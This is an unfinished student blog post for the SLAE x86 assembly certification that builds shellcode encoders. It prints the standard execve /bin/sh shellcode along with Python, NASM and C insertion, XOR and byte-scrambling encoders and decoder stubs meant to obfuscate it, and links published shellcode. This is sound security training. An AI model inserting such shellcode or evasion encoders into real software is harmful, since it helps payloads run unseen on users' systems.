ASM Encoder (SLAE x86 Assignment #4)

Introduction

This is assignment #4 of the SLAE x86 Exam objectives.

Objectives

  • Create a custom encoding scheme like the “Insertion Encoder” we showed you
  • PoC using execve-stack as the shellcode to encode with your schema and execute

Notice

At the time of writing I already had a shellcode published on PacketStorm and Exploit-DB which could serve as a solution to this exercise. However, for completeness of this blog post, and to avoid having to explain the fstenv technique, I decided to build a new encoder here instead.

Download:

[Exploit-db]
Linux/x86 – execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes, xor encoded)

[PacketStorm]
Linux/x86 execve /bin/sh Shellcode
70 bytes small Linux/x86 shellcode with XOR decoder stub and fstenv MMX FPU spawning a /bin/sh shell.

Building a task plan and prerequisites

Vivek provided the following Python script and NASM decoder stub to encode and decode shellcode, respectively:

Insertion-Encoder.py:

#!/usr/bin/python

# Python Insertion Encoder 
import random

shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

encoded = ""
encoded2 = ""

print 'Encoded shellcode ...'

for x in bytearray(shellcode) :
	encoded += '\\x'
	encoded += '%02x' % x
	encoded += '\\x%02x' % 0xAA

	# encoded += '\\x%02x' % random.randint(1,255)

	encoded2 += '0x'
	encoded2 += '%02x,' %x
	encoded2 += '0x%02x,' % 0xAA

	# encoded2 += '0x%02x,' % random.randint(1,255)



print encoded

print encoded2

print 'Len: %d' % len(bytearray(shellcode))

insertion-decoder.nasm

; Filename: insertion-decoder.nasm
; Author:  Vivek Ramachandran
; Website:  http://securitytube.net
; Training: http://securitytube-training.com 
;
;
; Purpose: 

global _start			

section .text
_start:

	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx

decode: 
	mov bl, byte [esi + eax]
	xor bl, 0xaa
	jnz short EncodedShellcode
	mov bl, byte [esi + eax + 1]
	mov byte [edi], bl
	inc edi
	add al, 2
	jmp short decode	



call_shellcode:

	call decoder
	EncodedShellcode: db 0x31,0xaa,0xc0,0xaa,0x50,0xaa,0x68,0xaa,0x2f,0xaa,0x2f,0xaa,0x73,0xaa,0x68,0xaa,0x68,0xaa,0x2f,0xaa,0x62,0xaa,0x69,0xaa,0x6e,0xaa,0x89,0xaa,0xe3,0xaa,0x50,0xaa,0x89,0xaa,0xe2,0xaa,0x53,0xaa,0x89,0xaa,0xe1,0xaa,0xb0,0xaa,0x0b,0xaa,0xcd,0xaa,0x80,0xaa, 0xbb, 0xbb

The insertion encoder by Vivek adds the 0xaa byte after each of the shellcode bytes, while my published shellcode mentioned above has them XOR’d against the value 0x7d.

The code for the XOR Encoder is as follows:
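To make the insertion scheme concrete, it can be modelled in a few lines of Python 3. This is only a sketch: the names insertion_encode and insertion_decode are mine and not part of Vivek’s material, and the decoder simply mirrors the in-place copy loop of the NASM stub above, including the 0xbb, 0xbb end marker.

```python
FILLER = 0xAA   # byte inserted after every shellcode byte
MARKER = 0xBB   # end marker appended twice, as in the NASM listing

def insertion_encode(shellcode: bytes) -> bytes:
    """Insert FILLER after each byte, then append the end marker."""
    out = bytearray()
    for b in shellcode:
        out += bytes([b, FILLER])
    out += bytes([MARKER, MARKER])
    return bytes(out)

def insertion_decode(encoded: bytes) -> bytes:
    """Model of the stub: compact the buffer in place until the filler check fails."""
    buf = bytearray(encoded)
    edi, eax = 1, 1                      # same starting values as the stub
    while (buf[eax] ^ FILLER) == 0:      # xor bl, 0xaa / jnz
        buf[edi] = buf[eax + 1]          # copy the next real byte down
        edi += 1
        eax += 2
    # the final copy moved one MARKER byte, so it is dropped here
    return bytes(buf[:edi - 1])
```

Calling insertion_decode(insertion_encode(shellcode)) should give back the original bytes, which is a quick way to sanity-check an encoded buffer before pasting it into the NASM file.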

#!/usr/bin/python

# Python XOR Encoder 

shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

encoded = ""
encoded2 = ""

print 'Encoded shellcode ...'

for x in bytearray(shellcode) :
	# XOR Encoding 	
	y = x^0xAA
	encoded += '\\x'
	encoded += '%02x' % y

	encoded2 += '0x'
	encoded2 += '%02x,' %y


print encoded

print encoded2

print 'Len: %d' % len(bytearray(shellcode))

Then it gets decoded via the assembly as follows:

...
decoder:
	pop edi
	lea esi, [edi +8]
	xor ecx, ecx
	mov cl, 4
...
call_decoder:

	call decoder
	decoder_value: db 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa
	EncodedShellcode: db 0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a

Vivek’s version of the decoder stub uses the jmp-call-pop technique: the call instruction pushes the address of decoder_value onto the stack, and pop edi retrieves it. We then iterate through EncodedShellcode 8 bytes at a time and XOR each 8-byte block against the value in decoder_value.

My idea is to build something of a shellcode scrambler, or at least that’s what I called it. As it would probably be too complicated to explain all at once, I will build it in stages. The overall idea is as follows:
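The XOR round trip can also be checked in Python 3. A minimal sketch, assuming the 8-byte key of 0xaa bytes and the 4 iterations (mov cl, 4) shown in the stub excerpt; xor_encode and xor_decode_blocks are illustrative names, and the block-wise loop only models what the elided instructions are described as doing.

```python
KEY = bytes([0xAA] * 8)   # decoder_value from the stub excerpt
BLOCK = 8                 # bytes handled per iteration

def xor_encode(shellcode: bytes, key: int = 0xAA) -> bytes:
    """XOR every byte with a single-byte key, like the Python encoder."""
    return bytes(b ^ key for b in shellcode)

def xor_decode_blocks(encoded: bytes, key: bytes = KEY, rounds: int = 4) -> bytes:
    """XOR the buffer against the 8-byte key, one 8-byte block per round."""
    buf = bytearray(encoded)
    for r in range(rounds):
        start = r * BLOCK
        # the sketch stops at the end of the buffer instead of running past it
        for i in range(start, min(start + BLOCK, len(buf))):
            buf[i] ^= key[i - start]
    return bytes(buf)
```

Four rounds of 8 bytes cover 32 bytes, which is enough for the 25-byte execve shellcode.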

  • Scramble / reposition each byte of the shellcode
    • To accomplish this, we would also need to either:
      • add an additional byte pointing to the offset for each pair repositioned, OR
      • have a predefined pattern of where each-byte-goes-where
  • Add a bitwise operation, like XOR
  • Add an additional arithmetic operation, like incrementing each byte by a given value

The order in which the above tasks are implemented could differ. As the repositioning / scrambling of each byte is obviously the hardest part of the exercise, I decided to start with it, to avoid debugging the most complicated part at the end with an additional encoding layer present.

The shellcode used for the exercise is the one spawning a /bin//sh shell via execve, as the exercise objective requires:
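The two arithmetic layers from the list are simple enough to sketch in Python 3 already. This is an assumption about how they might look, not the finished encoder: the key 0xAA, the increment 0x03, the order (XOR first, then add) and the function names are all hypothetical.

```python
XOR_KEY = 0xAA    # hypothetical key
ADD_VALUE = 0x03  # hypothetical increment

def add_layers(data: bytes, xor_key: int = XOR_KEY, add: int = ADD_VALUE) -> bytes:
    """Encode: XOR each byte, then increment it (wrapping at 256)."""
    return bytes(((b ^ xor_key) + add) & 0xFF for b in data)

def remove_layers(data: bytes, xor_key: int = XOR_KEY, add: int = ADD_VALUE) -> bytes:
    """Decode: undo the layers in reverse order, subtract first, then XOR."""
    return bytes((((b - add) & 0xFF) ^ xor_key) for b in data)

def has_null(data: bytes) -> bool:
    """An encoded buffer containing 0x00 would need a different key or increment."""
    return 0 in data
```

The decoder has to undo the layers in the opposite order to the encoder, which is one more reason to get the scrambling stage working before stacking anything on top of it.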

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

However, to keep track of what I am actually doing, I’ll start with a simple placeholder pattern like \xAA\xBB\xCC\xDD.

As the above shellcode is 25 bytes in length, let’s extend the placeholder pattern up to the 25th letter:

0xAA,0xBB,0xCC,0xDD,0xEE,0xFF,0xGG,0xHH,0xII,0xJJ,0xKK,0xLL,0xMM,0xNN,0xOO,0xPP,0xQQ,0xRR,0xSS,0xTT,0xUU,0xVV,0xWW,0xXX,0xYY

Next to each shellcode byte, I will add another byte containing the position of that byte in the original shellcode. So if \x31 is at the beginning of the shellcode, I will add its offset next to it, using 01 for the first position to avoid introducing a null byte.

0xAA,0x01, 0xBB, 0x02...

For the execve shellcode, we start from the original bytes:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

Next to each byte, we add its position, that is, the values from 1 to 25 in hex:

\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19

Of course this doubles the size of the shellcode, but as the goal here is obfuscation rather than a small buffer size, we do not care about this.

The following C program will put the offsets as explained in a variable called shellcode_scrambled and output the result:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

unsigned char shellcode[] = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

unsigned char pos[] = \
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19";

int main(void)
{
        /* sizeof counts the string terminator, so subtract 1 */
        size_t len = sizeof(shellcode) - 1;
        unsigned char* shellcode_scrambled = malloc(len * 2);
        if (shellcode_scrambled == NULL)
                return 1;

        size_t i, a;
        /* a walks the original shellcode, i walks the output (2 bytes per input byte) */
        for (i = 0, a = 0; a < len; i += 2, a++)
        {
                shellcode_scrambled[i] = shellcode[a];
                shellcode_scrambled[i+1] = pos[a];
        }

        printf("\n");
        /* use the known length: the buffer is not null-terminated */
        for (i = 0; i < len * 2; i++)
                printf("\\x%02x", shellcode_scrambled[i]);
        printf("\n");

        free(shellcode_scrambled);
        return 0;
}

The resulting shellcode:

\x31\x01\xc0\x02\x50\x03\x68\x04\x2f\x05\x2f\x06\x73\x07\x68\x08\x68\x09\x2f\x0a\x62\x0b\x69\x0c\x6e\x0d\x89\x0e\xe3\x0f\x50\x10\x89\x11\xe2\x12\x53\x13\x89\x14\xe1\x15\xb0\x16\x0b\x17\xcd\x18\x80\x19

Each byte now has its index appended, so we can shuffle the 2-byte pairs in a totally random order. This is an additional task on its own, as we have to track which byte pairs have already been used in order to keep the shellcode consistent.
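One possible way to handle the bookkeeping is to shuffle the list of pairs as a whole, so every pair is used exactly once by construction. The Python 3 sketch below is an assumption about how this stage could look rather than the final encoder; scramble, unscramble and the optional seed parameter are illustrative names.

```python
import random

def pair_with_index(shellcode: bytes) -> list:
    """Return (byte, 1-based position) pairs; starting at 1 avoids a null index."""
    return [(b, i) for i, b in enumerate(shellcode, start=1)]

def scramble(shellcode: bytes, seed=None) -> bytes:
    """Shuffle the (byte, index) pairs and flatten them into one buffer."""
    if len(shellcode) > 255:
        raise ValueError("a single index byte can only address 255 positions")
    pairs = pair_with_index(shellcode)
    random.Random(seed).shuffle(pairs)   # a permutation: no pair is lost or reused
    return bytes(v for pair in pairs for v in pair)

def unscramble(scrambled: bytes) -> bytes:
    """Put each byte back at the position stored next to it."""
    out = bytearray(len(scrambled) // 2)
    for k in range(0, len(scrambled), 2):
        value, index = scrambled[k], scrambled[k + 1]
        out[index - 1] = value
    return bytes(out)
```

The unscramble function is the part an assembly decoder stub would have to reproduce: read a pair, then write the first byte to the offset given by the second.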

*** [WORK IN PROGRESS] ***

Download

execve /bin/sh (fstenv eip GetPC technique) Shellcode (70 bytes, xor encoded):

PacketStormSecurity:
https://packetstormsecurity.com/files/163057/Linux-x86-execve-bin-sh-Shellcode.html

Exploit-db:
https://www.exploit-db.com/shellcodes/49976

Github:
https://github.com/d7x/shellcode/blob/main/linux/mmx-xor-decoder_eip.c





This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-34669